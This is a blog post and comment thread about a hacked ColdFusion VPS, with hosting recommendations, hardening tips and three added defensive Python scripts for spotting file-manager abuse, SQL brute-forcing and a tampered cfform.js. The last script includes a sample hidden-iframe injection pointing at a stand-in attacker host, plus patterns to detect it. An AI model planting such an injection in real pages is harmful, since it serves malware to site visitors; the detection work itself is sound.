Web Software Architecture and Engineering – Life on the Bleeding Edge

I’ve been using the folks at kickassvps.com for a while now. However, I found that my VPS was unreliable at times, and my blog would regularly go down.
Last night I logged in to discover that mysterious software was installed on my server. I’ve been hacked! The problem with the VPS, as is common in virtualization, is that companies tend to neglect patching these systems.
I tried to use the live support feature on the host’s website, didn’t work! I opened a ticket, and got a response when I woke up the next morning, asking me questions on what to do!
Ummm… so I’ve made the decision to move my blog to another provider. Any recommendations? I’m running Windows 2003 w/ CF8.


Comments on: "VPS Hacked – Need Recommendations" (33)

  1. If you use a file manager, see if it is available to the public without logging into an admin or other CMS system. If so, then look through server logs of that file being accessed and note the referrer. Hackers have been known to search google for “cffm.cfm” or other open source file managers to look for weaknesses.
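The check described in this comment, as an added example that is not part of the original thread: parse IIS W3C log lines, pick out requests that reached a file-manager script without being turned away, and report the client address and the referrer so you can see whether the visitor arrived from a search-engine query. The `#Fields:` layout follows IIS's own header convention; the log lines, the second script name and the search-engine host list are constructed for the demonstration.

```python
# Added example (not from the original post): scan IIS W3C extended log lines for
# requests to a publicly reachable file manager script and report who fetched it
# and which referrer brought them there. Column names come from the "#Fields:" header.
from collections import Counter

# Scripts worth watching. "cffm.cfm" is named in the comment above; the second
# entry is an assumed example, not a complete list.
FILE_MANAGER_SCRIPTS = {"/cffm.cfm", "/filemanager.cfm"}

# Referrer hosts that indicate the visitor found the script through a search query.
SEARCH_ENGINE_HOSTS = ("google.", "bing.", "yahoo.")

# Constructed IIS 6 log excerpt for the demonstration (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) cs(Referer)
2009-06-22 03:12:41 203.0.113.7 GET /index.cfm - 200 Mozilla/4.0 -
2009-06-22 03:14:07 198.51.100.23 GET /cffm.cfm - 200 Mozilla/4.0 http://www.google.com/search?q=cffm.cfm
2009-06-22 03:14:09 198.51.100.23 POST /cffm.cfm action=upload 200 Mozilla/4.0 http://www.example.com/cffm.cfm
2009-06-22 03:20:15 203.0.113.7 GET /cffm.cfm - 401 Mozilla/4.0 -
"""


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than guess at column alignment
        yield dict(zip(fields, values))


def suspicious_file_manager_hits(text):
    """Return entries that reached a file-manager script without being rejected.

    A 401/403 means the server demanded a login, which is the healthy case; a 200
    means the script answered an unauthenticated client, which is what to chase.
    """
    hits = []
    for rec in parse_iis_log(text):
        if rec["cs-uri-stem"].lower() not in FILE_MANAGER_SCRIPTS:
            continue
        if rec["sc-status"] in ("401", "403"):
            continue
        referer = rec.get("cs(Referer)", "-")
        hits.append({
            "ip": rec["c-ip"],
            "method": rec["cs-method"],
            "status": rec["sc-status"],
            "referer": referer,
            "found_via_search_engine": any(h in referer.lower() for h in SEARCH_ENGINE_HOSTS),
        })
    return hits


def hits_by_ip(text):
    """Count unauthenticated file-manager hits per client address."""
    return Counter(h["ip"] for h in suspicious_file_manager_hits(text))


if __name__ == "__main__":
    for h in suspicious_file_manager_hits(SAMPLE_LOG):
        flag = " <-- arrived from a search engine" if h["found_via_search_engine"] else ""
        print(f'{h["ip"]} {h["method"]} {h["status"]} referer={h["referer"]}{flag}')
```

On a real server, feed it the contents of the site's `ex*.log` files; a 200 on the file manager from an address that also shows a search-engine referrer is the case the comment describes, and the POST that follows from the same address is what to look at next.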

  2. Thanks guys. Looks like a couple things:

    1. Someone logged into the Windows box and installed software.
    2. Someone continues to try hacking the SQL Server from China.

    Must be Chinese hackers. Sophisticated hosts can simply block traffic from whole countries, and that’s what I’d like.

    As for HostMySite, I pay $35 per month now and get 1GB RAM, whole HostMySite is $116 for 512MB. It's definitely out of my budget, and that is why I didn't get them in the first place.

  3. Sami,

    I think this qualifies as “You get what you pay for”. For $35/month, I’d expect little to no support, and that’s all I’d ask for. For $189/mo (1GB monthly from HMS), I’d expect top-notch support, and creative solutions to this kind of problem.

  4. Shannon,

    I agree. But having been a Sys Admin at an ISP, the way I see it, if I’m paying that much per month, I can build my own server and do co-location, and get ROI in less than a year based on HMS’s prices. There isn’t much support needed for hosting a blog to warrant that kind of pricing. And if I’m paying 100-200, then I’d do dedicated or colocation. High priced VPS don’t make sense, unless I’m re-hosting and selling $20 accounts and email boxes out to companies.

  5. Now might be a really good time to look into getting into the “cloud”. (Depending on your needs)

    HMS just announced their Cloud hosting. They don’t have prices published.
    http://www.hostmysite.com/cloud9/
    Also check out these guys, they offer a pay for what you use model.
    http://www.mosso.com/
    http://www.gogrid.com

  6. I think Shannon said it best.

    Sami, they aren’t hosting ‘a blog’. They are hosting the VM. Even if you don’t have a single thing on it, you’d still have to pay.
    Your argument makes sense in that it does not cost them a lot to host a VPS. What does cost them time/money is customer service. Which apparently they are lacking, and is probably why their prices are lower.

  7. Mark,

    I did look at that. If I’m getting traffic from China in the cloud, my costs would sky rocket. The cloud is still hairy in my opinion, and I’m watching as it matures.

    Jules,

    Again, I agree. But I meant, I am hosting a blog, they are maintaining the VM. I can't justify paying $1000+/yr for a blog, then I'd rather move to WordPress. And I don't need much support for a blog either. Only makes sense if you're hosting dozens of low-end sites and making up that money. At least that's the way I see it.

  8. a vps is a vps and while i’ve been using hms for several years and love their support, the fact of the matter is that everyone is prone to get hacked.

    some simple tips for your vps:

    enable windows firewall. the company firewall will only protect you from external attacks while having a firewall running on the vps will prevent internal attacks.

    did you make sure you locked down iis? http://seclists.org/basics/2006/May/0116.html

    did you lock down sql server?

  9. Steve Rittler said:

    We’ve been using HostMySite for years now…reliable, impressively fast response to questions/requests, not a single negative thing to say about them.

    Strong positive recommendation for their VPS solution.

  10. I posted an article recently on this topic, of getting what you pay for. I will also say I have had a VPS (the higher tier one) at HMS for over 2 years now. Never had a single problem. They also keep the patches up to date as well. There are also things you can do in Windows itself to lock things down as well. For the SQL Server issue you are having you can add an IPSEC rule to only allow access to the SQL Server from your IP or multiple IPs. This will greatly help you out there.

  11. I think to Sami's point though not everyone has 120-160 per month to spend on a hobby. For most of us blogging is a hobby and a way to give back to the community and I am not sure about everyone else but I don't make jack on my blog. If he was talking about client work that would be another but unless you got money to burn it's hard to justify the cost.

  12. Have you considered a blank linux VPS with Railo? Sure there is a bit of a learning curve and you can't use MS SQL but the prices are much cheaper. Or if your home internet is decent you can host a blog from home on an old PC.

  13. Why are you paying for a VPS + CF8 to just run a blog? A $5/month shared-server hosting account should be just fine. Too much traffic maybe?
    I have a website and added a blog to help promote my business. But it's on a shared server… I can't afford anything more at this point. But I don't need anything bigger anyway.

  14. Thanks for your comments everyone.

    Dan,

    Thanks for understanding. 🙂

    Jules,

    Yeah, my experience with shared hosting is horrible. Plus, the plan is to add websites. And yes, traffic is a big issue.

  15. Paul,

    I’m definitely thinking maybe Linux and Railo maybe an option. I also have decent Internet access at home, so that is an option as well. All good suggestions.

    Sami

  16. Sami,

    I use VivioTech.net: http://www.viviotech.net/vps.cfm. I pay about $500 annually, but had my own CF license (thanks to CF Objective a couple years back). I have my blog and a few client sites which cover the annual fee. They offer Open BD and I'm sure you can install Railo too. It is a Linux based server, but the basics are pretty easy to learn. I am also very pleased with the support I've had from the fellas running the place. I believe Peter F. still uses viviotech too, you can give him some affiliate points by using the link from his blog banner: http://blog.maestropublishing.com/

  17. Sami,

    Have you figured out yet how they did it? Do you run your own SQL Server or do you use the one provided by the host? What kind of rights is the SQL Server DSN running with? I'd be curious to know exactly how this happened. Until then, I don't know that you can assume it is the host's fault.

    Disclaimer: I am a kickassvps.com customer and kickassvps.com sponsors my blog.

    Depending on the reason, this could just as easily have happened with any host if the problem occurred at the application level due to an admin misconfiguration.

  18. Jason,

    Last I heard, that morning they responded, they had elevated the matter to their “senior admin.” I got one reply, that they would follow my instructions and perform Windows Updates and look at the billion ‘sa’ login attempts on SQL.

    Never heard from them again. I just cleaned up as much as I could on my end.

    So, no, I have not figured anything out yet, except even at a base level, they don't seem very concerned with the hack. I think they had set up the SQL Server… The DSN is running with minimal rights.

    Obviously there is much more I could do, but at a basic level, their VPS’ seem vulnerable.

  19. @Sami,

    I'm curious what software was installed. I'd like to make sure my VPS was not compromised. Do you think they got in through MS SQL Server? I am not running SQL Server, and right now I do not see anything amiss.

  20. Jason,

    Just IIS, CF8, SQL. Otherwise basic software like browsers, etc.

    Sami

  21. @Sami, sorry, I meant what was the software the hacker installed.

    “Last night I logged in to discover that mysterious software was installed on my server. “

  22. Jason,

    My bad!

    Limewire, RapidShare Downloader, and other P2P downloading tools.

    I'm hoping there isn't much else.

  23. Jason,

    And curiously, Opera 10 as well.

  24. Sami,
    Getting hacked is the worst. I feel ya brother.

    My media center at home got hacked a few weeks ago. They did a brute force password attack on the administrator account. I had remote desktop enabled so I could hit the box from work. That was dumb. What was really weird was that it was someone from Poland that used my box to download a movie using bittorrent. Probably to circumvent censorship.

    I hope I am not telling you stuff you already know but….

    The best way to avoid a good portion of these hack attempts for servers *and* desktops is the following.

    Turn off any windows services you are not using. Google for: “turn off windows services & security” or some such to get a list of what is safe to turn off.

    Do a lock down using windows (or another) firewall. Be draconian.

    KAVPS have an external firewall. Have them lock down everything except essential services: RDS, POP, SMTP, SFTP, HTTP, SHHTP and any db ports. You can also admin the databases locally using remote desktop.

    Disable the administrator account and create an admin account with an obscure user name.

    Make a user wait 5 or 10 min after one or two failed logins.

    That will stop most brute force attacks. Most hackers are looking for an easy way in.

    I am on kick ass VPS as well. Now you got me paranoid.
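Two things in this thread come together here: the "billion 'sa' login attempts" Sami mentioned in comment 18, and the "make a user wait after a couple of failed logins" rule in the comment above. The following is an added example, not code from any commenter: it reads SQL Server error-log lines of the `Login failed for user '...' [CLIENT: x.x.x.x]` shape, counts failures per source address inside a sliding window, and derives the wait-until time that rule would impose. The sample lines, the threshold and the window length are constructed for the demonstration.

```python
# Added example (not from the original post): turn SQL Server failed-login
# messages into a per-source failure count over a sliding window, then apply a
# "wait N minutes after K failures" rule of the kind the comment above suggests.
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Shape of the message SQL Server logs on a failed login; the group names are
# ours. The "Error: 18456" line that precedes it carries no client address and
# is deliberately not matched.
FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[\d.]+)\]"
)

# Constructed error-log excerpt (addresses are documentation ranges, not real hosts).
SAMPLE_ERRORLOG = """\
2009-06-22 03:14:07.12 Logon       Error: 18456, Severity: 14, State: 8.
2009-06-22 03:14:07.12 Logon       Login failed for user 'sa'. [CLIENT: 198.51.100.23]
2009-06-22 03:14:08.40 Logon       Login failed for user 'sa'. [CLIENT: 198.51.100.23]
2009-06-22 03:14:09.01 Logon       Login failed for user 'sa'. [CLIENT: 198.51.100.23]
2009-06-22 03:14:09.77 Logon       Login failed for user 'sa'. [CLIENT: 198.51.100.23]
2009-06-22 03:15:30.00 Logon       Login failed for user 'blogapp'. [CLIENT: 203.0.113.7]
2009-06-22 03:55:12.50 Logon       Login failed for user 'sa'. [CLIENT: 198.51.100.23]
"""


def parse_failed_logins(text):
    """Return (timestamp, user, client_ip) tuples, one per failed-login line."""
    events = []
    for line in text.splitlines():
        m = FAILED_LOGIN.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
            events.append((ts, m.group("user"), m.group("ip")))
    return events


def failures_by_user(text):
    """How many failures each login name attracted; 'sa' dominating is the usual sign."""
    return Counter(user for _ts, user, _ip in parse_failed_logins(text))


def brute_force_sources(text, threshold=3, window=timedelta(minutes=10)):
    """Return {ip: time the threshold was first crossed} for sources that produced
    `threshold` or more failures inside any interval of length `window`."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    flagged = {}
    for ts, _user, ip in sorted(parse_failed_logins(text)):
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()               # drop failures that have aged out of the window
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def lockout_until(text, ip, threshold=3, delay=timedelta(minutes=10)):
    """The 'wait after K failures' rule: once a source crosses the threshold, its
    further attempts are refused until the crossing time plus `delay`. Returns
    None for sources that never crossed it."""
    crossed = brute_force_sources(text, threshold=threshold)
    return crossed[ip] + delay if ip in crossed else None


if __name__ == "__main__":
    print("failures by user:", dict(failures_by_user(SAMPLE_ERRORLOG)))
    for ip, when in brute_force_sources(SAMPLE_ERRORLOG).items():
        print(f"{ip}: threshold crossed at {when}, refuse until {lockout_until(SAMPLE_ERRORLOG, ip)}")
```

The sliding window matters: the lone failure from the second address is an ordinary typo and is not flagged, while the burst from the first address is flagged on its third attempt. On a real box the same logic can drive a firewall block list, but the cheaper fix the thread already names, restricting who may reach the SQL port at all, removes the noise at its source.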

  25. Sami,

    On June 21st – June 23rd, 2009, HostMySite was hit by a cyber attack. An unknown party gained access to the shared hosting services using a ColdFusion exploit and modified numerous cfform.js JavaScript files across multiple domains so that ColdFusion pages which employed the CFFORM tag also loaded a hidden iframe which then attempted to load a bloodhound virus. HostMySite was unable to immediately fix the problem and after several days finally moved the domains on the affected server to another unaffected machine. One of our clients was one such affected domain. I write because HostMySite has not disclosed the attack to its customers, even though its customers may have been infected by the virus. If you did not see the attack in-progress, and call HMS support, you would not have heard about it. For a period of two days, multiple sites were serving viruses along with their standard web content.

    Did you experience any problems during this period?
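A way to check your own server for the tampering this comment describes, as an added example that is not code from the commenter or from HostMySite: compare each copy of cfform.js against a known-good hash and look inside it for hidden-iframe markup or a `document.write()` that emits an iframe, which a stock cfform.js has no reason to contain. The file bodies and the "known good" hash below are constructed stand-ins; on a real server the baseline hash would be taken from a clean install of the same ColdFusion version.

```python
# Added example (not from the original post): detect a modified cfform.js by
# (a) comparing its hash with a clean baseline and (b) looking for an injected
# hidden iframe, with or without a document.write() wrapper.
import hashlib
import os
import re

HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden"
    r"|width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b)[^>]*>",
    re.IGNORECASE,
)
WRITES_IFRAME = re.compile(r"document\.write\s*\(.*?iframe", re.IGNORECASE | re.DOTALL)

# Constructed stand-ins for a clean and a tampered cfform.js (not real file contents).
CLEAN_CFFORM_JS = "/* cfform.js (constructed stand-in) */\nfunction _CF_checkCFForm(f){return true;}\n"
TAMPERED_CFFORM_JS = CLEAN_CFFORM_JS + (
    "document.write('<iframe src=\"http://attacker.invalid/x.htm\" "
    "style=\"display:none\" width=\"0\" height=\"0\"></iframe>');\n"
)


def sha256_hex(data):
    """Hex SHA-256 of a str (UTF-8) or bytes body."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    return hashlib.sha256(data).hexdigest()


# Baseline taken from the constructed clean copy; replace with the hash of a
# clean install's cfform.js on a real server.
KNOWN_GOOD_SHA256 = sha256_hex(CLEAN_CFFORM_JS)


def inspect_cfform_js(content, known_good=KNOWN_GOOD_SHA256):
    """Return a list of findings for one cfform.js body; an empty list means clean."""
    findings = []
    if sha256_hex(content) != known_good:
        findings.append("hash differs from known-good baseline")
    if HIDDEN_IFRAME.search(content):
        findings.append("hidden iframe markup present")
    if WRITES_IFRAME.search(content):
        findings.append("document.write() injects an iframe")
    return findings


def scan_files(files):
    """files: {path: content}. Returns {path: findings} for tampered copies only."""
    report = {}
    for path, content in files.items():
        findings = inspect_cfform_js(content)
        if findings:
            report[path] = findings
    return report


def scan_directory(root):
    """Walk a webroot and inspect every file named cfform.js (any case)."""
    found = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower() == "cfform.js":
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    found[path] = fh.read().decode("utf-8", errors="replace")
    return scan_files(found)


if __name__ == "__main__":
    sample = {"C:/inetpub/siteA/CFIDE/scripts/cfform.js": CLEAN_CFFORM_JS,
              "C:/inetpub/siteB/CFIDE/scripts/cfform.js": TAMPERED_CFFORM_JS}
    for path, findings in scan_files(sample).items():
        print(path, "->", "; ".join(findings))
```

The hash comparison catches any change at all, including ones the two pattern checks would miss; the pattern checks give you something readable to show a host when you open the ticket. Point `scan_directory()` at each site's root, since the script is copied per site under `CFIDE/scripts/`, and a shared-hosting neighbour's copy is the one most likely to differ.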

  26. Server Intellect has managed VPS boxes. They can assist ya with updating and patching the box if you don't have time. Never had a problem with them yet. Their support is great too. I hope all goes well for you.

  27. Sami,

    Any luck on picking a new host?

    One more place you might want to look into is http://vps.net/. They have a neat offering. It is scalable cloud services for a fair price, but they have monthly billing. So, if you do get massive traffic you don't pay big $.

    They don't offer CF out of the box. But I have used railo on my blog without issue. They also have a managed VPS/ cloud option and they offer Turnkey VPSs. Auto patching and updating. (Though, I have not tried Turnkey with railo.)

    I think in the next few months I will be making the move over to vps.net

  28. I have posted your blog on my site

  29. VPS hosting is an important part of web hosting

  30. VPS plays an important role in web hosting

  31. That is really sad. I would definitely be looking for a new host!

  32. That is sad. I would definitely be looking for a new host!
